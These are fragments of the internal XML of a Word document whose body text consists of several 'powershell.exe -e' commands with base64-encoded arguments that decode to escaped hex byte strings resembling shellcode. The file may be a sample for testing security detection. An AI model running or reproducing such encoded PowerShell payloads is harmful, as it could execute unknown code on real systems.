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A31849" w14:textId="1A205DBC" w:rsidR="003B38E1" w:rsidRDefault="00B545E5">
      <w:r w:rsidRPr="00B545E5">
        <w:t>powershell.exe -e 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</w:t>
      </w:r>
      <w:r w:rsidRPr="00B545E5">
        <w:lastRenderedPageBreak/>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidRPr="00B545E5">
        <w:lastRenderedPageBreak/>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidRPr="00B545E5">
        <w:lastRenderedPageBreak/>
        <w:t>IAXAB4ADMAYgBcAHgAMwAzAFwAeAAzAGIAXAB4ADMAYgBcAHgAMwAzAFwAeAAzAGIAXAB4ADMAYgBcAHgAMwAzAFwAeAAzAGIAXAB4ADMAYgBcAHgAMwAzAFwAeAAzAGIAXAB4ADMAYgBcAHgAMwAzAFwAeAAzAGIAXAB4ADMAYgBcAHgAMwAzAFwAeAAzAGIAXAB4ADMAYgBcAHgAMwAzAFwAeAAzAGIAXAB4ADMAYgBcAHgAMwAzAFwAeAAzAGIAXAB4ADMAYgBcAHgAMwAzAFwAeAAzAGIAXAB4ADMAYgBcAHgAMwAzAFwAeAAzAGIAXAB4ADMAYgBcAHgAMwAzAFwAegAnAA==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5793CA0E" w14:textId="77777777" w:rsidR="00B545E5" w:rsidRDefault="00B545E5"/>
    <w:p w14:paraId="3D53F2A8" w14:textId="042B728D" w:rsidR="00B545E5" w:rsidRDefault="00B545E5">
      <w:r w:rsidRPr="00B545E5">
        <w:t>powershell.exe -e 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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F1190D" w14:textId="77777777" w:rsidR="00B545E5" w:rsidRDefault="00B545E5"/>
    <w:p w14:paraId="33CA8697" w14:textId="362013BA" w:rsidR="00B545E5" w:rsidRDefault="00B545E5">
      <w:r w:rsidRPr="00B545E5">
        <w:t>powershell.exe -e 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</w:t>
      </w:r>
      <w:r w:rsidRPr="00B545E5">
        <w:lastRenderedPageBreak/>
        <w:t>Z4XGQ0eFxjNnhcZDR4XDMzeFwzNnhcYzZ4XGU0eFwyM3hcMjZ4XDk3eFwyNHhcNjV4XGM0eFwwM3hcNjV4XDIzeFwyNXhcOTd4XDk0eFw0NXhcYTR4XDc3eFw5NHhcNDV4XGE0eFxhNnhcMTN4XDM0eFxkNHhcOTd4XDU1eFw5N3hcMzZ4XGE3eFw2NHhcNzR4XDM2eFw1M3hcYTR4XDc0eFxkNHhcOTd4XDU1eFwzNHhcMzZ4XGM2eFwxM3hcMzR4XGQ0eFw5N3hcNTV4XDM0eFwyNnhcMzd4XDY1eFw3NHhcMTZ4XGE3eFxhNHhcODV4XGE1eFwzM3hcOTN4XDc0eFwzNnhc</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B545E5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BE4654" w14:textId="77777777" w:rsidR="004D30AF" w:rsidRDefault="004D30AF" w:rsidP="005C3548">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6B4D37C1" w14:textId="77777777" w:rsidR="004D30AF" w:rsidRDefault="004D30AF" w:rsidP="005C35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DD1F70" w14:textId="2B668B02" w:rsidR="005C3548" w:rsidRDefault="005C354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7EFA44B" wp14:editId="59D2B06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320098940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A66BFD" w14:textId="388983CE" w:rsidR="005C3548" w:rsidRPr="005C3548" w:rsidRDefault="005C3548" w:rsidP="005C354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C354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EFA4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2.95pt;margin-top:0;width:84.15pt;height:26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11A66BFD" w14:textId="388983CE" w:rsidR="005C3548" w:rsidRPr="005C3548" w:rsidRDefault="005C3548" w:rsidP="005C354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C354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4BDF66" w14:textId="7E29CDE9" w:rsidR="005C3548" w:rsidRDefault="005C354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4CD64AD" wp14:editId="41406500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469106435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7EBB9C" w14:textId="48F040F7" w:rsidR="005C3548" w:rsidRPr="005C3548" w:rsidRDefault="005C3548" w:rsidP="005C354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C354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CD64A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2.95pt;margin-top:0;width:84.15pt;height:26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" filled="f" stroked="f">
              <v:fill o:detectmouseclick="t"/>
              <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,20pt,15pt">
                <w:txbxContent>
                  <w:p w14:paraId="707EBB9C" w14:textId="48F040F7" w:rsidR="005C3548" w:rsidRPr="005C3548" w:rsidRDefault="005C3548" w:rsidP="005C354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C354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027DA5" w14:textId="4799131E" w:rsidR="005C3548" w:rsidRDefault="005C354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67F3133" wp14:editId="6B66B7C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212755961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675AF4" w14:textId="79192D69" w:rsidR="005C3548" w:rsidRPr="005C3548" w:rsidRDefault="005C3548" w:rsidP="005C354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C354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7F313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2.95pt;margin-top:0;width:84.15pt;height:26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" filled="f" stroked="f">
              <v:fill o:detectmouseclick="t"/>
              <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,20pt,15pt">
                <w:txbxContent>
                  <w:p w14:paraId="55675AF4" w14:textId="79192D69" w:rsidR="005C3548" w:rsidRPr="005C3548" w:rsidRDefault="005C3548" w:rsidP="005C354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C354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008EEA" w14:textId="77777777" w:rsidR="004D30AF" w:rsidRDefault="004D30AF" w:rsidP="005C3548">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7B46031A" w14:textId="77777777" w:rsidR="004D30AF" w:rsidRDefault="004D30AF" w:rsidP="005C35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5E5"/>
    <w:rsid w:val="003B38E1"/>
    <w:rsid w:val="004739D3"/>
    <w:rsid w:val="004D30AF"/>
    <w:rsid w:val="005C1843"/>
    <w:rsid w:val="005C3548"/>
    <w:rsid w:val="00B545E5"/>
    <w:rsid w:val="00B6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E48B58"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{247BAEC6-F4A6-344E-9AF4-D38FE81D5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5E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C35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5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1487</Words>
  <Characters>8476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Janardanreddy Pennampalli -X (jpennamp - CAPGEMINI TECHNOLOGY SERVICES INDIA LIMITED at Cisco)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Janardanreddy Pennampalli -X (jpennamp - CAPGEMINI TECHNOLOGY SERVICES INDIA LIMITED at Cisco)</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-19T13:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-19T18:56:00Z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cae65f9,4eaf1c7c,1bf5ff03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